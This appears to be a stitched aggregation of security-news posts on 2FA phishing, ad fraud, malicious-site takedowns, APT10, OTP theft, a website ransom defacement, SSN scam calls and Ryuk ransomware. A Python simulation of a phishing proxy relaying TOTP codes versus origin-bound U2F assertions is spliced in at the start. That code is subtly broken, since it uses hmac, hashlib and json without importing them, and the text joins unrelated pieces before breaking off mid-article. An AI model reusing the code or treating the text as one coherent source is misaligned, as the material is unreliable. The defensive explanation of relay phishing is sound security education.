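import struct

STEP = 30  # TOTP time step in seconds


# ---- TOTP (RFC 6238): a code the proxy can relay as long as it is still fresh ----
def totp(secret: bytes, now: int, digits: int = 6) -> str:
    counter = struct.pack(">Q", now // STEP)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def verify_totp(secret: bytes, code: str, now: int, window: int = 1) -> bool:
    """Accept the current step and `window` steps either side, as most servers do."""
    return any(hmac.compare_digest(totp(secret, now + k * STEP), code)
               for k in range(-window, window + 1))


def relay_totp(secret: bytes, now: int, delay: int) -> bool:
    """The victim types the code into the proxy at `now`; the phisher submits it
    `delay` seconds later. Returns whether the real site accepts it."""
    victim_code = totp(secret, now)
    return verify_totp(secret, victim_code, now + delay)


# ---- Simplified U2F: the assertion is bound to the origin the browser saw ----
class Authenticator:
    def __init__(self, key_secret: bytes):
        self._secret = key_secret     # stands in for the per-site private key
        self.counter = 0

    def sign(self, app_id: str, client_data: bytes) -> dict:
        self.counter += 1
        to_sign = (hashlib.sha256(app_id.encode()).digest()
                   + struct.pack(">I", self.counter)
                   + hashlib.sha256(client_data).digest())
        return {"client_data": client_data, "counter": self.counter,
                "sig": hmac.new(self._secret, to_sign, hashlib.sha256).digest()}


class RelyingParty:
    def __init__(self, origin: str, key_secret: bytes):
        self.origin = origin
        self._secret = key_secret     # stands in for the registered public key

    def verify(self, challenge: str, assertion: dict) -> bool:
        cd = json.loads(assertion["client_data"])
        if cd.get("challenge") != challenge or cd.get("origin") != self.origin:
            return False              # signed for some other page: the phishing origin
        to_sign = (hashlib.sha256(self.origin.encode()).digest()
                   + struct.pack(">I", assertion["counter"])
                   + hashlib.sha256(assertion["client_data"]).digest())
        expected = hmac.new(self._secret, to_sign, hashlib.sha256).digest()
        return hmac.compare_digest(expected, assertion["sig"])


def browser_sign(auth: Authenticator, page_origin: str, challenge: str) -> dict:
    """The browser fills in the origin of the page that made the request; a page
    on the phishing domain cannot ask for a signature over the real origin."""
    client_data = json.dumps({"challenge": challenge, "origin": page_origin}).encode()
    return auth.sign(page_origin, client_data)


REAL_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login.example.com.evil-proxy.test"   # constructed phishing origin


def relay_u2f(page_origin: str) -> bool:
    """The proxy forwards the real site's challenge to the victim's browser, which
    is on `page_origin`, and relays the assertion back. Returns whether the real
    site accepts it."""
    key = b"per-site-key-secret"                  # constructed key material
    rp = RelyingParty(REAL_ORIGIN, key)
    auth = Authenticator(key)
    challenge = "c0ffee-challenge-from-real-site"
    assertion = browser_sign(auth, page_origin, challenge)
    return rp.verify(challenge, assertion)


if __name__ == "__main__":
    t = 1_500_000_000
    print("TOTP relayed 20s later accepted:", relay_totp(b"shared-seed", t, 20))
    print("TOTP relayed 90s later accepted:", relay_totp(b"shared-seed", t, 90))
    print("U2F from real origin accepted:  ", relay_u2f(REAL_ORIGIN))
    print("U2F via phishing origin accepted:", relay_u2f(PHISH_ORIGIN))
```

The code carries no information about where it was typed, so a proxy that relays it within the server's acceptance window wins. A U2F assertion carries the origin in the signed client data, and the browser only lets a page request a signature over its own origin, so the relayed assertion names the phishing domain and the real site rejects it without the attacker ever touching the key.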

Since all the incidents we mentioned here are all phishing attempts, it still pays to know what to look out for when determining whether a website, email, text, or other communication is a phish. Never click unknown links without verifying their authenticity first. Always check the URLs in the address bar—and remember, the green padlock is no longer enough to identify whether a site is safe or not.

Furthermore, users might drop the use of SMS 2FA and opt for a stronger second form of authentication, such as an authentication app or biometrics. Make it a point to regularly review account access logs to check if someone other than yourself is attempting to gain entry to your online accounts. Avoid conducting business, especially that involving the exchange of sensitive information or documents, using your personal email. And if you can, put additional encryption in your messages by using Pretty Good Privacy (PGP). Lastly, use password managers—they not only have better memories than their humans, but they also keep you away from phishing sites by checking the URLs on the address bar before auto-populating fields.

For mobile users, avoid downloading apps from third-party stores. Better yet, avoid looking for app utilities you think will optimize your mobile device. For example, if you’re looking to extend battery life, don’t download an app. Adopt some simple steps, such as turning off GPS when you’re not using it, or using the phone in battery-saver mode.

2FA is still good to have

Adopting 2FA is well-known, popular cybersecurity advice we give to those who want to beef up the security—and consequently, the privacy—of their accounts. But it’s also a known fact that 2FA is not bulletproof, hack-proof, or the cybersecurity panacea many assume it to be.

It is true that some forms, such as SMS-based OTPs, are a lot easier to circumvent than others. It is also true that there are more than 10 known ways to defeat 2FA to date. However, this doesn’t mean that 2FA itself is broken. Using 2FA is still far better than having just a user name and password locking your account.

The defeat of certain forms of 2FA isn’t a call for total abandonment nor should it be considered as one. It signals us, the users, to explore and go for better, more advanced forms of 2FA in securing our accounts. It also forces us to re-think our habits, adapt accordingly to this change in the threat landscape, and continue to learn about the latest social engineering tactics and tricks that could target us in the environments and sites we frequent.

Stay safe!

The post Has two-factor authentication been defeated? A spotlight on 2FA’s latest challenge appeared first on Malwarebytes Labs.

Cybercrime could cost companies trillions over the next five years

Companies globally could incur $5.2 trillion in additional costs and lost revenue over the next five years due to cyberattacks, as dependency on complex internet-enabled business models outpaces the ability to introduce adequate safeguards that protect critical assets, according to Accenture. Based on a survey of more than 1,700 CEOs and other C-suite executives around the globe, the report, Securing the Digital Economy: Reinventing the Internet for Trust, explores the complexities of the …

The post Cybercrime could cost companies trillions over the next five years appeared first on Help Net Security.

Researchers analyze DDoS attacks as coordinated gang activities

In a new report, NSFOCUS introduced the IP Chain-Gang concept, in which each chain-gang is controlled by a single threat actor or a group of related threat actors and exhibits similar behavior across the various attacks conducted by the same gang.

IP Gang attack-type classification against attack volume size

Researchers analyzed attack types, volume, size of events, gang activities, and attack rates. By studying the historical behavior of the 80 gangs identified in the report, …

The post Researchers analyze DDoS attacks as coordinated gang activities appeared first on Help Net Security.

Russian hacker Alexander Zhukov extradited by Bulgaria to US

Bulgaria has extradited to the United States a Russian hacker indicted by a US court for running a sophisticated hacking scheme.

According to the Russian embassy in Washington, the Russian hacker Alexander Zhukov was extradited on January 18. The Russian embassy has chosen to disclose the news on the VK social network, the Russian version of Facebook. The hacker is currently held in a jail in Brooklyn, New York.

“Employees of the Consulate General in New York will visit him in jail soon,” the embassy said.

Zhukov is accused of being involved in a sophisticated ad fraud scheme that leverages advertising and malware to compromise computer networks.

In November, law enforcement and private firms such as Google and White Ops took down one of the largest and most sophisticated digital ad-fraud campaigns, dubbed 3ve, which infected over 1.7 million computers to carry out advertising fraud.

The name 3ve is derived from a set of three distinct sub-operations using unique measures to avoid detection, and each of them was built around different architectures with different components.

3ve has been active since at least 2014, and experts observed a peak in its activity in 2017. It has been estimated that the campaign allowed its operators to earn more than $30 million; the people involved in the ad-fraud campaign are all from Eastern Europe.

The United States Department of Justice indicted 8 individuals from Russia, Kazakhstan, and Ukraine, one of them is Zhukov.

The operators used a broad range of techniques to monetize their efforts: they created counterfeit websites, used their own botnet to simulate visitor activity on them, offered the resulting ad space to advertisers, and used Border Gateway Protocol (BGP) hijacking to redirect traffic. The crooks also used malicious code to generate fake clicks on online ads and earn money.

Zhukov 3ve campaigns

The infrastructure involved in the 3ve ad-fraud campaign was huge: according to the experts, the fraudsters infected 1.7 million computers with malware, and the attackers used thousands of servers and more than 10,000 counterfeit websites to impersonate legitimate web publishers.

The experts discovered that crooks used over 60,000 accounts selling ad inventory generating a record of 3 to 12 billion of daily ad bid requests.

Zhukov, aka Nastra, was arrested in November in Bulgaria, where he had lived since 2010.

“According to Kommersant newspaper, which claims to have spoken with a friend of Zhukov, the hacker stood out on the dark web for the selective way he chose his jobs, staying away from credit-card theft or child pornography,” reported AFP.

“Zhukov was earning about $20,000 per month on his fake ad-view contracts, but was exposed after a conflict with his US client, Kommersant said.”

Pierluigi Paganini

(SecurityAffairs – Zhukov, ad fraud)

The post Russian hacker Alexander Zhukov extradited by Bulgaria to US appeared first on Security Affairs.

Hosting malicious sites on legitimate servers: How do threat actors get away with it?

How do threat actors manage to get their sites and files hosted on legitimate providers’ servers? I have asked myself this question many times, and many times thought, “The threat actors pay for it, and for some companies, money is all that matters.”

But is it really that simple? I decided to find out.

I asked some companies, as well as some of my co-workers who are involved with site takedowns on a regular basis, about their experiences.

I conversed with William Tsing, who is, among other things, responsible for infringements on the Malwarebytes brand; Steven Burn, our Website Protection Team Lead; and a spokesperson for International Card Services B.V. (ICS), the company behind the well-known Visa and Mastercard credit cards. I also sent inquiries to some international banks, but as of press time, they have not replied. On the receiving end of takedown requests, I queried providers about their methods and motives.

Background for the investigation

To give you some background on why we are involved in take-downs: Even though we protect our customers by adding malicious domains and IPs to our block lists, we also report those sites and try to get them taken offline. This does not always result in a successful takedown, but if there is a chance to protect everyone against malicious sites (and not just our clients), we will always grab the opportunity.

Let’s look at this problem from a few angles, starting with the initiators of takedowns.

Protecting your brand and your customers

Imposters can give your company an undeserved bad reputation and cause financial damages. Many financial companies are held responsible for losses due to phishing mails and fake copies of their websites. So they are generally well organized when it comes to dealing with abuse complaints. In the financial sector, one of the biggest problems is phishing mails linking to imitation sites. These imitations can be convincing, complete with green padlocks and ironic warnings about phishing.

Financial corporations in general and banks in particular are well prepared for abuse cases. Most of them have the following in place:

  • Educational pages on their site about how to recognize and deal with phishing attempts.
  • Self-help instructions about what to do if you clicked on a link or entered your credentials on a fake site.
  • An abuse email address where customers and researchers can forward phishing mails and where you can report fake sites.
  • An abuse department that is constantly fighting to get sites taken offline that are targeting their brand(s).

The spokesperson for ICS let us know that they always attempt to take down malicious sites and are successful in about 300 cases per month, globally. In their experience, most providers are quick to take action, but sometimes differing time zones and office hours drag on the process longer than necessary.

At Malwarebytes, we also have to deal with imposters, some of which are selling our free product and others who are tech support scammers pretending to be our support department. William Tsing has had a few of these guys for breakfast, but there are some cases where it is frustrating to have fraudulent content removed. Some of our grievances are:

  • Dealing with automated bots that are impossible to convince there is something fraudulent going on.
  • No response from the provider at all.
  • A culture that would rather receive complaints about content than complaints from disgruntled customers who had their content removed—no matter what that content is.

GoDaddy website

This provider apparently knows what should be removed.

Hosting and other providers

As mentioned earlier, we also sent some inquiries to hosting companies and, this may not come as a surprise: the companies that actually do act upon takedown requests were the only ones that responded. The rest decided to deal with my request for information in the same way they would with a takedown request—they ignored it.

According to Steven Burn, who is responsible for the Malwarebytes block lists, this is typical behavior. In his experience, however, Western European and North American hosting companies are usually a lot more cooperative than Russian and Chinese providers.

We have asked these hosting companies what they consider malicious content, and the ones that responded agreed on the following reasons for taking sites offline:

  • Phishing content
  • Hacking content
  • Malware (as downloads)
  • Spamming

Some others also specified:

  • Illegal software and cracks
  • Inappropriate content

These providers all estimated the time between receiving a complaint and fixing the problem to be well under eight working hours. I know from experience that most are even faster. We also know that the ones that didn’t respond are more likely to deal with requests from big companies faster than those of researchers, or as they put it, “unrelated third parties.” And some may not respond at all, or worse, have an automated bot send you responses that drive you up the wall or into despair.

URL-shorteners

There are other providers at play when it comes to malicious sites. Take, for example, URL-shorteners. URL shortening services are often used by cybercriminals to obfuscate redirects to malicious destinations. So, if you’re unable to get the website itself removed because the hosting provider is unresponsive, you can try to get the URL-shortener to remove the shortened link from their redirections list. In some cases where the threat actor spread the link only in the shortened form, this could be just as effective. Most of these URL-shortening services provide excellent support, as well as detailed instructions on their site on how to proceed.

bitly abuse

Registrars

A domain name registrar is a company that manages the reservation of Internet domain names. In the chain of hosting malicious websites, they are at least as important as the company providing the physical server. A registrar can stop DNS requests for a domain from reaching the attacker’s server. A registrar is also the party that, in effect, enables threat actors when they use techniques like Domain Generation Algorithms (DGAs). If the threat actor is unable to automatically register the domains generated by the algorithm, the entire setup of the DGA fails. Sometimes the registrar and the hosting company are the same, but this is not always the case.

Server scans

Another question I asked the providers is whether they perform scans of their servers for inactive malware or for malicious sites. Inactive malware on a server could indicate that a website is hosting malware for download. Hosted malware can be used as a payload for downloader Trojans, or it could be offered for download under the smokescreen of pretending to be a legitimate file. The providers responded that their servers are protected, but not by security software that scans for inactive malware. One provider, however, indicated that they scan newly-created sites for signs that the site could be used for malicious purposes in order to proactively set them offline.

Security researchers

Many security researchers will report their findings to interested parties. How effective they are seems to depend on how well they are connected. This is unfortunate, as requests from relatively unknown researchers can be just as legitimate as those from longtime players. Our belief is that every complaint should be taken seriously, whether it was sent to the general abuse email address or to the head of the department; whether it comes from a finance company, an antivirus vendor, or an independent botnet researcher.

Our experience with providers varies so widely that it’s hard to give general guidance. There is a provider that lets Steven Burn take sites offline himself and asks questions later. There was a provider that kept getting abused by tech support scammers, but when I pointed it out to them, they sought and found a common property in all the accounts that the threat actors registered with them. By doing so, they were able to root out all the scammers’ sites, even the ones that hadn’t been published yet. These are some examples of the ways in which we could work together to make the Internet a safer place.

But if you are a researcher or work in an abuse department, you also know the other end of the spectrum. I’m talking about the providers that would sell their grandfather for a buck or the social media giants that get so many complaints, it takes months just to get past the automated responses.

The answer to my question

In an ideal world, threat actors would have to use their own servers to host malicious sites. This would make it a lot easier for law enforcement to find out who they are and put them where they belong. Talking to some of the people who have to deal with this problem on a daily basis has more or less confirmed what I already suspected: the underlying problem with the hosting of malicious sites is money. However, it’s perhaps a bit more nuanced than I originally believed. My revised answer, then, would be that two issues are at play:

  • The provider does not care where the money comes from, or how the site will be used to make more money.
  • The provider has not prioritized spending money on a functioning abuse department.

Is there anything we can do to change these attitudes? There is one way to get providers to sit up and listen. When we host our own sites, we can ask ourselves which type of provider we would rather do business with: one that takes abuse seriously, or one that turns a blind eye to cybercrime? If negligent practices turn into profit losses, it’s likely these hosting companies will take takedown requests more seriously.

Waiting for legislation that holds providers partly responsible for the content they are hosting could take a long time—or it may not even happen in some countries. It’s best, then, to take matters into your own hands. If you see something, say something. And if you own your own website now or plan to launch one in the future, look into the business practices of those hosting companies and invest in those that are taking Internet safety seriously.

Do you have takedown experiences of your own to share? Have you ever reported a malicious site to a provider? Sound off in the comments section.

The post Hosting malicious sites on legitimate servers: How do threat actors get away with it? appeared first on Malwarebytes Labs.

This Week in Security News: Risky Radio Remotes and Cybercrime

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about Trend Micro’s new research on radio frequency technology and the risks of radio remote controllers. Also, understand why there is a rise in physical crime in the cybercrime underground.

Read on:

Exclusive: Hackers Take Control Of Giant Construction Cranes

Trend Micro Research discovered that the lack of implemented security in radio frequency technology could lead to production sabotage, system control, and unauthorized access to industrial machines. 

New Magecart Attack Delivered Through Compromised Advertising Supply Chain

Trend Micro found a malicious skimming code loaded on e-commerce websites providing ticketing, touring, and flight booking services as well as self-hosted shopping cart websites. 

Tesla is Entering the Model 3 Into Pwn2Own, One of the World’s Toughest Hacking Contests

Trend Micro is partnering with Tesla to include a Model 3 sedan in Pwn2Own Vancouver this year, the first time a car has been included in the annual high-profile hacking contest.

Google Play Apps Drop Anubis Banking Malware, Use Motion-based Evasion Tactics

Trend Micro found two malicious apps on Google Play, disguised as useful tools, that drop wide-reaching banking malware.

As the Government Shutdown Drags On, Security Risks Intensify

Cybersecurity risks grow during the US government shutdown as organizations within the Department of Homeland Security—including the new Cybersecurity and Infrastructure Security Agency—are operating with skeleton crews.

Attacks Against Industrial Machines via Vulnerable Radio Remote Controllers: Security Analysis and Recommendations

Radio frequency technology is being used to control various industrial machines. However, the lack of implemented security could lead to production sabotage, system control, and unauthorized access.

Hackers Breach and Steal Data from South Korea’s Defense Ministry

Hackers have breached 30 computers in the South Korean government agency that oversees weapons and munitions acquisitions, stealing documents from at least ten of those computers.

The Rise of Physical Crime in the Cybercrime Underground

While underground forums have long been the purview of digital crimes, recent developments have shown signs of increasing synergy and interaction between traditional criminals and cybercrime actors. 

Firms fined $1M for SingHealth Data Security Breach

SingHealth and Singapore’s public healthcare sector IT agency IHIS have been slapped with S$250,000 and S$750,000 financial penalties, respectively, for the July 2018 cybersecurity attack that breached the country’s personal data protection act.

Are you surprised that there is a rise in threat actors who engage in both traditional crime and cybercrime? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

Report: Iranian APT Actors Regroup After Main Security Forum Shuts Down

Iranian state-sponsored hackers are regrouping after the shutdown last year of their main security forum, migrating to other forums and making new connections for potential cyber-response against mounting political pressures from the United States and Europe, according to a new report.


The Advanced Persistent Threat files: APT10

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, aimed attacks on specific targets with the intention to compromise their systems and gain information from or about that target. While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in context sufficient enough for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re beginning with APT10. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT10?

First observed in 2009, APT10 is most commonly attributed via open source research to the Chinese Ministry of State Security (MSS). MSS attacks typically involve, but are not limited to: intelligence targets surrounding trade negotiations, research and development in competition with Chinese commercial entities, and high-value counterintelligence targets overseas. As an example of a trade negotiation op, Fidelis Security observed a watering hole attack in February 2017 targeting members of the National Foreign Trade Council, a US trade lobby group.

A commonly used tool of APT10 is Scanbox, a form of malware that can offer insights into their targeting priorities. Scanbox has been observed on assorted industrial sector targets in the US and Japan, but also on Uighur dissidents overseas. While this supports the thesis of APT10 being a government threat group, we caution defenders against associating any one piece of malware exclusively with one group. Countries maintain multiple threat groups, all of whom are fully capable of collaborating and sharing TTPs.

Malware commonly deployed

APT10 is known for deploying the following malware:

Note: Variants of PlugX and Poison Ivy were developed and deployed by Chinese state-sponsored actors. They have since been sold and resold to individual threat actors across multiple nations. At time of writing, it is inappropriate to attribute an attack to Chinese threat actors based on PlugX or Poison Ivy deployment alone.

Should you be worried?

That depends on the type of organization you run. APT10 has been observed to most commonly target construction, engineering, aerospace, and regional telecoms, as well as traditional government targets. If your company exists outside these verticals, it’s unlikely that APT10 would expend the time and resources to target you. For companies outside the targeting profile, it’s much more cost effective to spend defense budgets on common vulnerabilities that are most leveraged by common attackers.

What might they do next?

Like most APTs, APT10 has traditionally targeted at scale when attacking commercial enterprises. However, a more recent report by PricewaterhouseCoopers and BAE Systems suggests that they’ve begun devoting a portion of their operations to targeting Managed Service Providers (MSPs), most likely in an attempt to exfiltrate sensitive client data. Given the increasing awareness of advanced threats among high-value targets, continuing to target MSPs in this way is a plausible means of obtaining the same desired data at a lesser cost.

Further resources

If you’d like to do some additional reading on APTs, and specifically APT10, take a look at the following resources:

The post The Advanced Persistent Threat files: APT10 appeared first on Malwarebytes Labs.

OTP Theft on the Rise in Bengaluru; Many IT Employees Fall Victim

Numerous IT employees are falling victim to a new type of OTP theft currently on the rise in Bengaluru. No culprit has been caught so far, while lakhs of rupees have been stolen using this technique.

This theft differs from the rest: an individual calls posing as a bank employee and asks the victim to provide their card number and CVV in order to update or review their debit or credit card.

The unsuspecting victim does not realize that anyone would still need an OTP to complete a transaction, so the scamster then says the victim will receive an SMS, which needs to be sent back to the sender.

Such SMSes contain no intelligible content and are in encoded form. Acting like links when the victims tap on them, the incoming SMS is consequently forwarded to the scamster’s phone, which then completes the cash transaction — using the OTP from the victim’s account.

“The thefts were initially of relatively small amounts of ₹5,000-10,000. However, of late, larger amounts ranging from ₹50,000 to up to a few lakhs have been stolen. We have not been able to apprehend anyone yet. The victims also include several IT employees,” says a cybercrime official, adding that such cases came to light about 2-3 months ago.

“India as a country has not taken privacy seriously. Most of the time, most hackers are able to find out the bank you are banking with,” says Harsha Halvi, co-founder of TBG Labs. “OTP theft is more a privacy matter than a technological one. Perpetrators often gain the victim’s trust by dropping a name for reference, which would make the victim trust them. After that, finding information about the victim’s bank is also quite easy,” he added later.

Halvi also notes that, since it is not possible to build a software safeguard against this (many apps request access to SMSes), the solution will only begin to emerge if users become more mindful and stop granting apps access to SMSes; at that point, developers will be compelled to change their strategy.

Users are therefore advised, when receiving such calls, to check with their bank’s customer care numbers in order to avoid being caught up in such a scam.

Luas data ransom: the hacker who cried wolf?

In a terrible start to the year for Irish tram firm Luas, their site was compromised a week ago and adorned with a stark ransom warning:

hacked site

You are hacked. Some time ago I wrote that you have serious security holes.

You didn’t reply.

The next time someone talks to you, press the reply button.

You must pay one bitcoin in five days. Otherwise I will publish all data and send emails to your users.

The message came with a Bitcoin address, and the defacement was quickly taken down.

Real threat or a blast of bluster?

Many observers questioned the legitimacy of this ransom threat. One Bitcoin is currently around 3,100 Euros. Luas aren’t exactly short of cash, so it wouldn’t be an issue for them to pay (not that we’d advise it). The general feeling was that either 3,100 Euros was a large sum of money to the attacker, or they just wanted the company to address the problem facing them without fuss.

As soon as the hack was announced, nervous customers wondered exactly what might be dumped into the ether should the ransom go unpaid. Names and addresses? Emails? Perhaps even payment data? However, this is where the hacker’s version of events starts to unravel. I’m not personally familiar with the website in question, and it’s currently still down, so I looked on Internet Archive.

A trip down memory lane

The site doesn’t appear to have any form of registration or login; it seems to be more of an information portal. Additionally, the one section that references payment—“Pay your standard fare notice”—leads to the payments site, which Luas pointed out hadn’t been compromised. The site read as follows:

The Luas website is undergoing restoration following a cyber-attack.

We wish to advise customers that the Tax Saver and Standard Fare Notice sites have NOT been compromised.

It’s worth noting the payments section hasn’t been taken offline, either.

The hacker who cried wolf?

We waited with bated breath as the ransom timer ticked down. Would we see a large blast of customer data popping up online? Or would the whole thing fall flat? If essential information such as logins and payment data hadn’t been grabbed, what exactly were we talking about here? Basic website metrics such as visitor stats or website referrers? What could this attacker possibly have grabbed while achieving what appears to have been a perfectly standard webpage defacement in all other respects?

The answer is, of course, “Nobody knows.”

The deadline has come, gone, and is now on vacation somewhere. Occasionally, it lets you know the weather is lovely and reminds you to put the bins out.

Absolutely none of which helps anybody who suspects they may have been caught up in this. Even more surreal is the fact that Luas said they’d contact anyone they thought may be affected, but there’s no example of said contact on social media that I can find.

Customers: An update on the Luas cyberattack.

Luas technicians are still investigating it and are working to restore the site.

Luas has contacted the Commissioner for Data Protection and we have in accordance with best practice contacted everyone whose information may have been compromised.

This is absolutely not what normally happens, and at this point I’d usually be linking to a deluge of “you got me” posts. That’s the theory. The reality, currently, is nothing but a wave of silence.

This number is no longer available

Our suspicion here is that nothing customer related was taken and it was all a ransom-themed bluff to either grab some Bitcoin cash or attention, or perhaps both. If you’ve used any Luas site for any type of registration or payment, you’re probably fine.

Unless the site compromiser had a sudden change of heart, they were going to dump the data in public fashion instead of some hidden underground forum, but it hasn’t happened. People may call them “underground,” but the reality is data dumps don’t remain private for long.

No further updates are forthcoming from Luas, so it doesn’t appear they’ve been told their number is up either. All in all, we’d say cross some fingers and hope everything is coming up Milhouse.

While I try to remember if things coming up Milhouse is good or bad, here’s what you can do if you’re still worried you may be affected.

Data dump fallout tips

This isn’t just good advice for the Luas attack, but for any potential breach situation.

If you’re on Twitter, simply follow haveibeenpwned, a service maintained by security pro Troy Hunt. It will usually be one of the first places you’ll hear about any breach where data has been taken. After that, head over to the haveibeenpwned website and check if your emails have been included in any attacks. If they have, you’ll see a short summary of when it happened and what was taken. Note that you won’t see the stolen data.

Finally, you can register for alerts when any new breaches are added.

There’s really no need to go spelunking into the murky pools of hacker forums, looking in vain for a breach you may be on. Rest assured that if it’s happened, you’ll find out eventually—one way or another. At that point, it’s a case of changing your logins and applying whatever security steps are required to fix things up. Ransoms are always a major issue, whether from threats or infection files. If this story has any additional developments, we will of course update this post as to what anyone affected should do next.

The post Luas data ransom: the hacker who cried wolf? appeared first on Malwarebytes Labs.

Social Security Number scammers are at it again

The Federal Trade Commission (FTC) once again sounded the alarm in mid-December about the latest Social Security Number (SSN) scam that continues to affect thousands of Americans.

While most of us were only able to read about this type of scam in the past, the FTC now has an audio recording of an SSN scam robocall, which they released two weeks after the warning.

Play the audio below and familiarize yourselves with what an SSN scam sounds like. Take note of the sentence phrasing and the mild threat near the end of the automated recording, directed at those who aren’t motivated enough to call back the number it provided.

Transcription:

law enforcement agencies to suspend your Social Security number on an immediate basis, as we have received suspicious trails of information in your name. The moment you receive this message, I need you to get back to me on my department division toll-free number that is 1-888-952-5554. I repeat 1-888-952-5554. Verify the last four digits of your Social Security number when you call to better assist you with this issue. Now, if I don’t hear a call from you, we will have to issue an arrest warrant under your name and get you arrested. So, get back to me as soon as possible. Thank you.

This particular recording wasn’t specific about the “suspicious trails of information” they were referring to, but there have been reports to the FTC of scammers linking their target’s SSN to certain crimes they claim are taking place in Texas, such as illegally sending money outside of the country.

The FTC noted that the threat from individuals or groups pretending to be from the Social Security Administration (SSA) is growing at an exponential rate. In fact, there was a 994 percent increase in SSN scams reported to the FTC—from 3,200 in 2017 to 35,000 in 2018.

Not just a numb3rs g4m3

One attribute that makes SSN scams successful (and makes one more likely to accept the call) is the scammers’ use of technology to mimic the legitimate contact number of the Social Security Administration (SSA) so that it appears in the caller ID when contacting targets. In this case, the scammers used 1-800-772-1213, the SSA’s national customer service number. Yet SSN scams are more than just a numbers game.

Seeing red

To help clue you in on other tactics used by SSN scammers, below is a list of red flags or tactics these scammers practice that anyone with a Social Security Number should at least be familiar with:

  • The call comes out of nowhere—especially if you haven’t contacted the SSA first or you have no ongoing business with them, such as a pending Social Security Disability (SSD) application. If you do have a pending application with the SSA, an agent may call if the information in the application isn’t complete, answers on the form aren’t legible, or the agent has found some discrepancies between the information you provided in the application and the information they got from other Federal agencies. An SSA agent will only ask for your SSN if the one you provided is invalid or incorrect.
  • The purported SSA agent makes untruthful or worrying requests or claims, such as:
    • Your SSN is suspended because of crime-related links (such as what the robocaller claims in the recording above). Fact: Social Security numbers do not get suspended.
    • You need to “reactivate” your suspended SSN. Then, scammers either ask for more information or a fee to do this.
    • You need to pay for something immediately, like a debt (and they won’t allow you to appeal the amount you owe).
    • You need to send over your payment via a means they specify, such as the agent requiring you to pay using your prepaid debit card.
    • You need to provide a bank routing number or card details over the phone.
    • Your SSN is linked to malicious activities that will lead to your arrest or deportation.
    • The SSA system is down, so you need to provide the purported agent with your personal information, such as SSN, date of birth, mother’s maiden name, and bank information.

“SSA employees do contact citizens by telephone for customer-service purposes, and in some situations, an SSA employee may request the citizen confirm personal information over the phone,” writes Andrew Cannarsa, communications director for the Office of the Inspector General (OIG). “However, SSA employees will never threaten you for information or promise a Social Security benefit approval or increase in exchange for information. In those cases, the call is fraudulent.”

Just hang up

Hanging up is the best course of action when you have answered a call, deliberately or accidentally, that at some point starts to look like a scam. When in doubt, assume it’s a scam. Besides, no one, not even the legitimate SSA, will penalize you for hanging up on them. Remember that when it comes to nipping scams in the bud, you are in control. End it before they can say another word.

Prevention, of course, is still key. Being able to catch the known red flags we have identified above and knowing what to do should you see a legitimate SSA number flash in the caller ID screen—whether you do or don’t have outstanding business with them—can minimize the risk.

Is the SSA calling? Don’t pick up the phone. Instead, call SSA via their consumer service number and ask if they have been trying to reach you.

Other scams related to SSN

Unfortunately, children and the deceased aren’t safe from fraudsters and identity thieves, either. Parents, make sure you find the time to check your kids’ credit scores to make sure that they remain untouched and are not being built up by someone else. If you see something’s wrong, or if you see signs of potential identity theft, go to this FTC page to read more.

Relatives of deceased loved ones should do credit checks every now and then as well. The Identity Theft Resource Center has useful material on how one can protect the deceased’s identity and other tips.

When it comes to scams, the following is always true: does it seem suspicious or “off” in any way? If so, it probably is. Proceed with caution and guard your Social Security Number well.

The post Social Security Number scammers are at it again appeared first on Malwarebytes Labs.

Ryuk ransomware attacks businesses over the holidays

While families gathered for food and merriment on Christmas Eve, most businesses slumbered. Nothing was stirring, not even a mouse—or so they thought.

For those at Tribune Publishing and Data Resolution, however, a silent attack was slowly spreading through their networks, encrypting data and halting operations. And this attack was from a fairly new ransomware family called Ryuk.

Ryuk, which made its debut in August 2018, is different from many other ransomware families we’ve analyzed, not because of its capabilities, but because of the novel way it infects systems.

So let’s take a look at this elusive new threat. What is Ryuk? What makes it different from other ransomware attacks? And how can businesses stop it and similar threats in the future?

What is Ryuk?

Ryuk first appeared in August 2018, and while not incredibly active across the globe, at least three organizations were hit with Ryuk infections over the course of the first two months of its operations, landing the attackers about $640,000 in ransom for their efforts.

Despite a successful infection run, Ryuk itself possesses functionality that only a few other modern ransomware families share. This includes the ability to identify and encrypt network drives and resources, as well as to delete shadow copies on the endpoint. By deleting the shadow copies, the attackers disable the Windows System Restore option for users, and therefore make it impossible to recover from the attack without external backups.

Ryuk “polite” ransom note

One interesting aspect of this ransomware is that it drops more than one note on the system. The second note is written in a polite tone, similar to notes dropped by BitPaymer ransomware, which adds to the mystery.

Ryuk “not-so-polite” ransom note

Similarities with Hermes

Researchers at Checkpoint have already conducted deep analysis of this threat, and one of their findings was that Ryuk shares many similarities with another ransomware family: Hermes.

Inside of both Ryuk and Hermes, there are numerous instances of similar or identical code segments. In addition, several strings within Ryuk have been discovered that refer to Hermes—in two separate cases.

When launched, Ryuk will first look for the Hermes marker that is inserted into each encrypted file. This is a means to identify if the file or system has already been attacked and/or encrypted.

The other case involves whitelisted folders, and while not as damning as the first, the fact that both ransomware families whitelist certain folder names is another clue that the two families might share originators. For example, both Ryuk and Hermes whitelist a folder named “Ahnlab”, the name of a popular South Korean security vendor.

If you know your malware, you might remember that Hermes was attributed to the Lazarus group, who are associated with suspected North Korean nation-state operations. This has led many analysts and journalists to speculate that North Korea was behind this attack.

We’re not so sure about that.

Notable attacks

Multiple notable Ryuk attacks have occurred over the last few months primarily in the United States, in which the ransomware infected large numbers of endpoints and demanded higher ransoms than what we typically see (15 to 50 Bitcoins).

